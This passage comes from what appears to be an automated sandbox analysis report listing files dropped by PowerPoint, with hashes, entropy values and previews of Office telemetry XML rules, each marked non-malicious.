                                                                                                                              Size (bytes):467
                                                                                                                              Entropy (8bit):5.114441792324692
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdS6koCAvQiernXFJnqRXHaSMNO/HNUlu:2diHAvcrXvmp7
                                                                                                                              MD5:5A5E8FCD2C426315EC88CEE0085C41C8
                                                                                                                              SHA1:A080B9F517994EC4DB3F8010F9E02193DFE6543D
                                                                                                                              SHA-256:909BF7B326295CE3A631658AC9CCC7F6748A5D17B7E9265D16943B2B899F6DAC
                                                                                                                              SHA-512:E146B486EF52383382660CC01A162BAC0E28A8CFB67ECC255B297978B940B201B50353AC0E4F15E2FB16941DAC95BA2409149C784D2821F2E967799F16288915
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170140" V="0" DC="SM" EN="Office.Graphics.OnlineVideoAuthTicketInvalid" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="6ra24" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="HitCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):695
                                                                                                                              Entropy (8bit):5.116568979660504
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSSBrkoCAvQierg19purzUpElFrF5NXFJzDaXOUdyXHaSMNO/HNUlu:2dXSHAvcrg19p64kr1vm/Ip7
                                                                                                                              MD5:4F62F5F1120405231E3F31E204B8D488
                                                                                                                              SHA1:6F1403515F7FA1FE2DAB0F191286617F285D23F8
                                                                                                                              SHA-256:78BD7583DE21A57A442E75DFD506C97DBB8F7FA629ED1BCC98C130AD0FF5D86E
                                                                                                                              SHA-512:845B07B6F0DF6DEBB0D9018C0619E7E52D14924A2738EB7C22D4655167D3500333BF5CDD27BE88792B9F5677FE9AA0B976F369C87F4A6A554D3797549D6B13D2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170141" V="0" DC="SM" EN="Office.Graphics.CameoErrors" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="6vec7" A="6vec5 6vec4 6zbuc 6zbub 7wj9k 6ri1f 6sucd 6zbvs 6zbvq 6fu1f 6d0mz 6pkg4 6pkg2 6pkg0 6pkgy 6pkgw" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="ULS_TagId" />.. </S>.. </G>.. <C T="W" I="0" O="false" N="TagID">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="false" N="TagCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):537
                                                                                                                              Entropy (8bit):5.070273196820279
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdS7TbkoCAvQierVXFJTRcSp9yXHaSMNO/HNUlu:2dy8HAvcr5vSKop7
                                                                                                                              MD5:FB7A81BE7DD8FFD95BD9D125C0B20204
                                                                                                                              SHA1:6D75274B9309D845C923F09805E2E601EEB5CF92
                                                                                                                              SHA-256:CEDA3466305BC848994E4DFEB3F3D77EFD48C5478C7370C04AF4CF40CB9CD18C
                                                                                                                              SHA-512:4818E5E0CB3B8F83D38C3B5C444DE3C0AD3F6F304E5611A8E919081DBC46D05CA5C02D9A83B8D06FFE2841CF238CEF7DB248CEA42F5BA6A13113C07659D01EC3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170142" V="2" DC="SM" EN="Office.Graphics.DXGIFactoryError" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bjghv" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="I32" I="0" O="false" N="HResult">.. <S T="1" F="HR result" />.. </C>.. <C T="U32" I="1" O="false" N="TagCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):451
                                                                                                                              Entropy (8bit):5.077204796891536
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSTLkoCAvQier3XFJnLXHaSMNO/HNUlu:2dTHAvcrnvLp7
                                                                                                                              MD5:1E72AC75F6CDDA4F1E2749CFF9D2B126
                                                                                                                              SHA1:56D802B22DDA9F1F3176937E0E35BBED69EF2A73
                                                                                                                              SHA-256:5C66054ACC45D2CF7AAECD32E5B2083ED86897A075B127E863A2D2AC1E0F4898
                                                                                                                              SHA-512:9AD38D102F48CC6D6F7392B7CB98254A8F8B3E5F3F6F87C101C223271EC938AAD8CB33F4C0DA03D4288EBA77B8B178BF3CF3ED0230F50B6A3B776F7E7D1EDF0E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170143" V="0" DC="SM" EN="Office.Graphics.SvgEarlyExit" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="4q37f" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="TagCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):547
                                                                                                                              Entropy (8bit):5.057924970005646
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSdm64rkoCAvQierL+MfXFJnLXHaSMdLRUDNO/HNUlu:2dGmrIHAvcrVvvLaqk7
                                                                                                                              MD5:8108A73CE11F34FB33381CB943DB9C2B
                                                                                                                              SHA1:961CB7140383A047253E46B9E8581DB16F61A140
                                                                                                                              SHA-256:0BEA1963E9F359272F91C91F9097BC99AB1B786CF98BA768AADA7606BA165464
                                                                                                                              SHA-512:5A395DD18DBF54421899D9655B80F3B29A8908F45039BB1337965E1DDA590C99F1F6C75C2B898AE40E576B5763EB1912AFEC7269C8A6B7C32525B3D9C9E1D26D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170144" V="0" DC="SM" EN="Office.Graphics.LogUnregisteredE2oComponents" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="4odv6" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="TagCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="W" I="1" O="true" N="Uri">.. <S T="1" F="Uri" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1236
                                                                                                                              Entropy (8bit):4.884913033347324
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdOp7IlFgKbfcHxp8er0+u/qNOhfX/c//rzKpONQlVZd9H/gypV2zZe/DzZydq:2dOyd0Hjr7uyYEmPlYeMeZix+t7tioB
                                                                                                                              MD5:8E957E4CC95C9BF89847E6AEB21718D8
                                                                                                                              SHA1:884B132F49911CEE6228223B9C103BE388A02DD4
                                                                                                                              SHA-256:7617BD8A62A8FA501A408CFFEF697231064E045CBA804E51F10421DB37793524
                                                                                                                              SHA-512:2FD4E055A4BD0819C65D503A9F8B3D748BC83A863C0391A1CDFD5094D1A70E03A5F7025F6D704B68EEE3476A74B92AD44E3BD7001CFCD3A06B0F54DAF40489E0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="180063" V="1" DC="SM" EN="Office.Excel.BISharedPolicyTipsOperationsPassthrough" ATT="19eb5e37de684ce38ce5cf3d5842d3f7-e8722941-bde5-4b98-9cd5-2775ec51482c-6873" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a24ob" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="Table" />.. </L>.. <R>.. <V V="PolicyTipsOperations" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="2" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="Correlation">.. <S T="2" F="ULS_CorrelationID" />.. </C>.. <C T="U32" I="2" O="false" N="SchemaVersion">.. <S T="2" F="SchemaVersion" />.. </C>.. <C T="W" I="3" O="true" N="DocumentId">.. <S T="2" F="DocumentId" M="Ignore" />.. </C>.. <C T="W" I="4" O="false" N="Operation">.. <S T="2" F="Operation" />.. </C>.. <C T="U32" I="5" O="true" N="Succeeded">.. <S T="2" F="Succeeded" M="Ignore" />
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1050
                                                                                                                              Entropy (8bit):4.898716261022594
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdaS7zlFgKbfcHxp8er0+u/qNOhfX/c//r9pONQlVZd9H/gypV2zZe/DzZydV9:2dDd0Hjr7uyYyPlYeMeZix+Pg
                                                                                                                              MD5:D5B08B165058F0CA8E4322E48D8D05FD
                                                                                                                              SHA1:3F845A78B1BDA86F80CBE5C94365C908160CADA2
                                                                                                                              SHA-256:7A360F433C302E0C6139B8C47C89E7F0BF9FC4F01691E065788691559F822C02
                                                                                                                              SHA-512:57EF6845DDCAAB1E6D88D5CBF77BC2AAE70ECFFFDDCC4411CA2D728A707E293124F85CDD47D10249491FD56DA08ACD6D79D78A148CF22E71DDA5971308A97182
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="180064" V="1" DC="SM" EN="Office.Excel.BISharedPolicyTipsErrorsPassthrough" ATT="19eb5e37de684ce38ce5cf3d5842d3f7-e8722941-bde5-4b98-9cd5-2775ec51482c-6873" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a24ob" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="Table" />.. </L>.. <R>.. <V V="PolicyTipsErrors" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="2" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="Correlation">.. <S T="2" F="ULS_CorrelationID" />.. </C>.. <C T="U32" I="2" O="false" N="SchemaVersion">.. <S T="2" F="SchemaVersion" />.. </C>.. <C T="W" I="3" O="true" N="DocumentId">.. <S T="2" F="DocumentId" M="Ignore" />.. </C>.. <C T="W" I="4" O="true" N="ErrorId">.. <S T="2" F="ErrorId" M="Ignore" />.. </C>.. <C T="W" I="5" O="true" N="ErrorMessage">.. <S T="2" F="ErrorMessage" M="Ignore"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):917
                                                                                                                              Entropy (8bit):4.92696250027353
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd+FuEFgKbfcHxp8eBSNahozCP+6bdy9kOw7dVVtN6R1p1x76NOcsu:2dw0HAItKB1O
                                                                                                                              MD5:516DAF9F915018EAB08CB0B3BFED421D
                                                                                                                              SHA1:C034D1D52AC9CC24A77B3A948788667649FD56B2
                                                                                                                              SHA-256:240E32AB698FDBA99DFE1307B4D804F465B717F89A3E4F10E163C9344FAEE3D7
                                                                                                                              SHA-512:C8D43E7323D1253CFC76B1A8CEE7C68B733B487B105FC2BB074E02EE7D402DC0C3D6C78C5B44E811FE4DBE95FFC3D23665409875EA8E93DC3C8B0838E5578BF3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="180178" V="0" DC="SM" EN="Office.Excel.Charting.ChartingErrors" ATT="19eb5e37de684ce38ce5cf3d5842d3f7-e8722941-bde5-4b98-9cd5-2775ec51482c-6873" DCa="PSU" xmlns="">.. <S>.. <UCSS T="1" C="Chart Load" S="Assert Unexpected" />.. <UCSS T="2" C="Chart Error" S="Assert Unexpected" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="I32" I="0" O="true" N="ErrorCode">.. <S T="3" F="SH_ErrorCode" M="Ignore" />.. </C>.. <C T="I32" I="1" O="true" N="ErrorId">.. <S T="3" F="SH_ErrorId" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="ErrorMessage">.. <S T="3" F="Error Message" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="FormatString">.. <S T="3" F="FormatString" M="Ignore" />.. </C>.. <C T="I32" I="4" O="true" N="LCID">.. <S T="3" F="LCID" M="Ignore" />.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):838
                                                                                                                              Entropy (8bit):4.89119988639781
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdKNMLp6AQierQSerrQjEBiPQOcg5lVZmgHaSMpAXHhSMNOFfAdHNS7lu:2dKNBrQFrEOsPXa2r
                                                                                                                              MD5:7A86D8C3DD97A2D57937524A803F5B88
                                                                                                                              SHA1:91F321456488D8986BE8A0F7FD744E2C76BB2B26
                                                                                                                              SHA-256:ECCE86992DBD474428063605B2634A3B0263681A10927CC2391C1E1433640C79
                                                                                                                              SHA-512:F6B6F44B7FE779BD6768F7F5458BE763AF9963E78A8F47EB51AE3115D664C6ABD087EA205DAFDA73084BBF8E81E5C85588314D244AA8C33D897377355D1DAD93
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="220004" V="0" DC="SM" EN="Office.Text.FSFontSubstitution" ATT="9c9dcb87a41b41bebea94330a23d828d-35611aa0-46ca-4351-98e0-5746b84e5be3-6973" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="as8v7" />.. <UTS T="2" Id="as8v8" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. <TR T="5" />.. <TI T="6" I="Hourly" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="5" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="false" N="TotalSuccess">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="2" O="false" N="TotalFailure">.. <C>.. <S T="2" />.. </C>.. </C>.. <T>.. <S T="6" />.. <S T="3" />.. <S T="4" />.. </T>.. <ST>.. <S T="1" />.. <S T="2" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):422
                                                                                                                              Entropy (8bit):5.3457963623438385
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBdsvkjKrYRHb3w+YWNkUpmERMFpAQUHperhgcOpiVlr7hie/I6BMNOn2sby:TMHdsxsR8MLp6AQierBPhFIyMNO2su
                                                                                                                              MD5:6B6FD0CB32A98C5AB23342841002D819
                                                                                                                              SHA1:3624E90F42707411132F0986BFFABF5B4C18423B
                                                                                                                              SHA-256:912738E0DA1AF51654D90DA293803BC8E63641D04FA4C2422CBE1A94A9D13EC6
                                                                                                                              SHA-512:19CC8D55A58520F2AE8EB872F51EED7778EA2EABD4AC4091F73F1322016122253DD78472EAD884B2ABA0533AF1359C796C7C81284E010B35687D65A1C91A410D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="220035" V="0" DC="SM" EN="Office.Text.WordUnknownGlyph.CharacterBasedRun" ATT="9c9dcb87a41b41bebea94330a23d828d-35611aa0-46ca-4351-98e0-5746b84e5be3-6973" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bdl49" />.. </S>.. <C T="U64" I="0" O="true" N="UnicodeRange">.. <S T="1" F="InfoOptDeci" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):418
                                                                                                                              Entropy (8bit):5.358585455462098
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBdBlvkjKrcSE63w+YWNkUpmERMFpAQUHperhRIEiVlr7hie/I6BMNOn2sby:TMHdFoScMLp6AQierLaPhFIyMNO2su
                                                                                                                              MD5:EB691C3E22E9DD512DCBB7415435735B
                                                                                                                              SHA1:3ADAEC87AE58EFA9281E48708A56E88A4A8CAE23
                                                                                                                              SHA-256:59ED717E8773A780692B414BEF354256B62EA7D5A66C9EEF2D071A416B0F5190
                                                                                                                              SHA-512:5DBBB06065A2B7CBE213BC8A286E0192C34A0E32701F85F5DCCACAE4C4355C18CD022A77CE8AA0730C472459645BFAA26A7310B3E01C8B465008DBE36DC3E5A5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="220036" V="0" DC="SM" EN="Office.Text.WordUnknownGlyph.GlyphBasedRun" ATT="9c9dcb87a41b41bebea94330a23d828d-35611aa0-46ca-4351-98e0-5746b84e5be3-6973" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="be9ms" />.. </S>.. <C T="U64" I="0" O="true" N="UnicodeRange">.. <S T="1" F="InfoOptDeci" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1358
                                                                                                                              Entropy (8bit):5.052627368675133
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dd0VeMY8rx3owzQ4oNFo4rOxmoi71c7muogcUDoMdHWzogXcOK:cweF8NYwz8koA3i7a7mvgcU8MdvgXcN
                                                                                                                              MD5:7E7787603B5331A8CB798B3395A022D3
                                                                                                                              SHA1:7EE564B391B18DFD925D96687F38CE82A25F73FD
                                                                                                                              SHA-256:101A06CBBDE8E7F2B67EF01ADD3F0EC7BD8C4DB68666EC7E7E02B154C37DF279
                                                                                                                              SHA-512:45E77EA95C54A091ED13197A17A218246042A2F536EDA59A1DC504042FBFDD6139DE535E2542C06F54FEEE423EFC66487F71D2BA83C6D2164A37C974095294E0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="222015" V="6" DC="SM" EN="Office.NaturalLanguage.Proofing.ProofingEventsRuleSpellerEvent" ATT="71cc1046851042108843d90e5d3ef6c1-61e5de5c-238c-4de5-95de-3b40d20ea6e5-6899" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a2dok" A="bkoh0 bn8xh" />.. </S>.. <C T="I32" I="0" O="true" N="SpellerEventUndoID">.. <S T="1" F="UndoID" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="SpellerEventCultureTag">.. <S T="1" F="CultureTag" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="SpellerEventEventName">.. <S T="1" F="EventName" M="Ignore" />.. </C>.. <C T="I32" I="3" O="true" N="IndexSelectedSuggestion">.. <S T="1" F="IndexSelectedSuggestion" M="Ignore" />.. </C>.. <C T="B" I="4" O="true" N="SpellerEventIsFromApplicationUndo">.. <S T="1" F="IsFromApplicationUndo" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="SpellerEventEndPoint">.. <S T="1" F="EndPoint" M="Ignore" />.. </C>.. <C T="B" I="6" O="true" N="Speller
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):548
                                                                                                                              Entropy (8bit):5.225258869256733
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdrcx/tySjtG9JU7PqLKEerCsntSjtg/AGqdLNSjtg/6NO2su:2dr0A+tmMY8rCCt+tgF6p+tgC
                                                                                                                              MD5:E3865BDCDD9165B9B49A4AA2D42C3788
                                                                                                                              SHA1:E232168E7637CB796BE3EDDE51BD8ACD5AACA6A8
                                                                                                                              SHA-256:58EEEB9CBD4D5C5F6F1943CCD4F86CB15FC40F082E8700280359AD7DD1E97647
                                                                                                                              SHA-512:EC0C816A328C130F54D0D7EA762328F50F8D03B4899FAF0A285412E6016BFD0035CD586B62EC7C1868BE00FE9CF7F64960C04F91F3CCEA5C7E4A15AD8516489D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="222042" V="0" DC="SM" EN="Office.NaturalLanguage.Proofing.ProofingToolsAdvertisementAction" ATT="71cc1046851042108843d90e5d3ef6c1-61e5de5c-238c-4de5-95de-3b40d20ea6e5-6899" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bdgkg" />.. </S>.. <C T="W" I="0" O="true" N="ActionProofingToolsAdvertisementAction">.. <S T="1" F="Action" />.. </C>.. <C T="W" I="1" O="true" N="LanguageTagProofingToolsAdvertisementAction">.. <S T="1" F="LanguageTag" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):619
                                                                                                                              Entropy (8bit):5.212456246069162
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd7bx/tRV9JU7PqLKEer1s+FnY6dVdKp4wyNO2su:2d1RMY8r13
                                                                                                                              MD5:A40F524DEC025CA5E9FD71C452212C37
                                                                                                                              SHA1:239B37C082E6F26F43ED6A0FFE07CF95CEF47A4B
                                                                                                                              SHA-256:ED99A27126594F2709EABC2466394C5EF68F75699E0AD6250A79E250F90D72FF
                                                                                                                              SHA-512:E771B227132250253E82A89946C123A3D4C1E133417DDCD4B69405D320381E4C9A15749B5A13830CCEA070B841E708B36611A561C6E80F82FDD066C315DD0873
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="222043" V="0" DC="SM" EN="Office.NaturalLanguage.Proofing.ProofingOptionChange" ATT="71cc1046851042108843d90e5d3ef6c1-61e5de5c-238c-4de5-95de-3b40d20ea6e5-6899" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bdgkh" />.. </S>.. <C T="W" I="0" O="true" N="OptionNameProofingOptionChange">.. <S T="1" F="OptionName" />.. </C>.. <C T="U32" I="1" O="false" N="OldValueProofingOptionChange">.. <S T="1" F="OldValue" />.. </C>.. <C T="U32" I="2" O="false" N="NewValueProofingOptionChange">.. <S T="1" F="NewValue" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):805
                                                                                                                              Entropy (8bit):5.197205363382414
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdBJex/tJ49JU7PqLKEerHlykvMfgdhRZPMfyt3RrfMfkn0hMfIm78xNO2su:2dunMMY8rHlyEM07hMIrfMVMdw3
                                                                                                                              MD5:0DD20DC5150BB5C4DAD74BE1480E6F2F
                                                                                                                              SHA1:6B1F4637CC765D0EF3687E4474AD71056DF9004C
                                                                                                                              SHA-256:68F1BDB711AB052426A9A8B5D6D5656CC9F7C249C9A3A34DC15E4DE8DC652D9E
                                                                                                                              SHA-512:6602E288FA7E9E334EF2F11BB65B5B5CCFFFAA92867A8569410FF54A1CF85CCC89CDF92D4220375A4FCA14F66E4A09C0D023C154CFA6E4270572B696185ACCE2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="222049" V="1" DC="SM" EN="Office.NaturalLanguage.Proofing.ProofingOptionState" ATT="71cc1046851042108843d90e5d3ef6c1-61e5de5c-238c-4de5-95de-3b40d20ea6e5-6899" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bij74" A="bn8xq" />.. </S>.. <C T="W" I="0" O="false" N="CultureTagProofingOptionState">.. <S T="1" F="CultureTag" />.. </C>.. <C T="W" I="1" O="false" N="ProofingOptionNameProofingOptionState">.. <S T="1" F="ProofingOptionName" />.. </C>.. <C T="I32" I="2" O="false" N="ProofingOptionValueProofingOptionState">.. <S T="1" F="ProofingOptionValue" />.. </C>.. <C T="B" I="3" O="false" N="IsDataShareableOutsideOfficeProofingOptionState">.. <S T="1" F="IsDataShareableOutsideOffice" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1344
                                                                                                                              Entropy (8bit):5.082434400405127
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dk8MY8rjzQzKxr81JV71c7mPcUC+syHF6D:cxF8fzDgr7a7mPcUM
                                                                                                                              MD5:527C4AF7A1F18F0FCEC5C024E28F0FFF
                                                                                                                              SHA1:4361E0F13AC318A6CD8E1AA46B5F3B0DE1C31091
                                                                                                                              SHA-256:532E79F1FDF4CCB927EA683235872D27A8EBE9BE43654D703188A2A4EE9E75D1
                                                                                                                              SHA-512:6379DD29E0DB04A43C80411D5AF40EC85E507FCB76BBC906989C2807FB030B3686866F0327B2E8CE9037EEC48E390FE38F8C0FD3B9DBCA6A6A6B90DF238EF781
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="222100" V="7" DC="SM" EN="Office.NaturalLanguage.Proofing.ProofingEventsRuleGrammarEvent" ATT="71cc1046851042108843d90e5d3ef6c1-61e5de5c-238c-4de5-95de-3b40d20ea6e5-6899" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a22tu" A="bkoh1 bn8xj" />.. </S>.. <C T="I32" I="0" O="true" N="GrammarEventUndoID">.. <S T="1" F="UndoID" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="GrammarEventCritiqueName">.. <S T="1" F="CritiqueName" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="GrammarEventCultureTag">.. <S T="1" F="CultureTag" M="Ignore" />.. </C>.. <C T="W" I="3" O="false" N="GrammarEventEventName">.. <S T="1" F="EventName" />.. </C>.. <C T="I32" I="4" O="true" N="GrammarEventIndexSelectedSuggestion">.. <S T="1" F="IndexSelectedSuggestion" M="Ignore" />.. </C>.. <C T="B" I="5" O="true" N="GrammarEventIsFromApplicationUndo">.. <S T="1" F="IsFromApplicationUndo" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1741
                                                                                                                              Entropy (8bit):5.0902287582059165
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dSqaDMY8rY3p+dF1GtvD/0jscm7dHwGNMXcR:cwDF8s0pKdwG2XcR
                                                                                                                              MD5:EF905904B45B3429A0C58432BC88005C
